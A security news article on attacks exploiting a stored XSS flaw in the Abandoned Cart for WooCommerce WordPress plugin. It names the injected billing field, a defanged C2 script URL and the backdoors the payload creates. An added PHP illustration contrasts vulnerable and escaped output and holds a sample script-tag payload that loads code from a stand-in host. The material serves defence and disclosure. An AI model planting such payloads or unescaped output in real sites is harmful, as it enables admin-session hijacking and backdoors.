Abandoned Cart for WooCommerce WordPress Plugin Exploited in Attacks

Unpatched versions of the Abandoned Cart for WooCommerce plugin for WordPress have been exploited in attacks, researchers say. Apparently, there’s a dangerous XSS (cross-site scripting) vulnerability in the plugin which affects both paid and free versions of the plugin.

Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce, said Wordfence researchers.

The Abandoned Cart for WooCommerce plugin is designed to help owners of WooCommerce sites track abandoned shopping carts in order to recover those sales. However, researchers discovered “a lack of sanitation on both input and output” which allows attackers to inject malicious JavaScript payloads into various data fields. These payloads execute when a logged-in user with administrator privileges views the list of abandoned carts from their WordPress dashboard.

How is the attack carried out? Cybercriminals create a cart with fake contact information, which is then abandoned. According to the report, the names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, while the billing_last_name field contains the injected payload.
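As an added illustration of the bug class described above (constructed example, not the plugin's own code): an admin table that echoes stored billing fields unescaped, next to a hardened version that escapes at output and sanitizes at input. Function names are hypothetical; esc_html() and sanitize_text_field() are real WordPress helpers, and the fallbacks are rough stand-ins so the file also runs outside WordPress.

```php
<?php
// Constructed example of the bug class described above; not the plugin's own
// code. Function names are hypothetical. esc_html()/sanitize_text_field()
// are real WordPress helpers; the fallbacks below only let this run outside WP.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        return trim(strip_tags($s)); // rough stand-in for the WP function
    }
}
// Constructed record: name fields exactly as an attacker could submit them.
$carts = [[
    'billing_first_name' => 'Jane Doe',
    'billing_last_name'  => '<script src="https://c2.example.invalid/x.js"></script>',
]];

// Vulnerable pattern: stored values concatenated into admin HTML unescaped,
// so the payload runs in the browser of whichever admin opens the list.
function render_rows_vulnerable(array $carts): string {
    $html = '';
    foreach ($carts as $c) {
        $html .= "<tr><td>{$c['billing_first_name']}</td>"
               . "<td>{$c['billing_last_name']}</td></tr>\n";
    }
    return $html;
}

// Hardened pattern: escape at output for the HTML text context. This alone
// neutralises the payload even for records that are already poisoned.
function render_rows_hardened(array $carts): string {
    $html = '';
    foreach ($carts as $c) {
        $html .= '<tr><td>' . esc_html($c['billing_first_name']) . '</td>'
               . '<td>' . esc_html($c['billing_last_name']) . "</td></tr>\n";
    }
    return $html;
}

// Input side, when the cart is saved: strip markup before storing. Defence in
// depth only; it does not replace output escaping.
function clean_billing_field(string $raw): string {
    return sanitize_text_field($raw);
}
echo render_rows_vulnerable($carts), render_rows_hardened($carts);
```

The first table row carries a live script element; in the second the same record renders as inert text, which is the property a fix like the one shipped in 5.2.0 has to guarantee.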


The shortener used in these attacks resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js.

The domain, which attempts to look innocuous by impersonating the legitimate, points to the command and control (C2) server behind the infection. The target script, visionstat.js, is a malicious JavaScript payload which uses the victim’s own browser session to deploy backdoors on their site.

It should be noted that two backdoors are deployed in the attacks: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both of these actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it, researchers said.

The researchers had detected 5,251 accesses to the link associated with the attacks.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the beginning. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
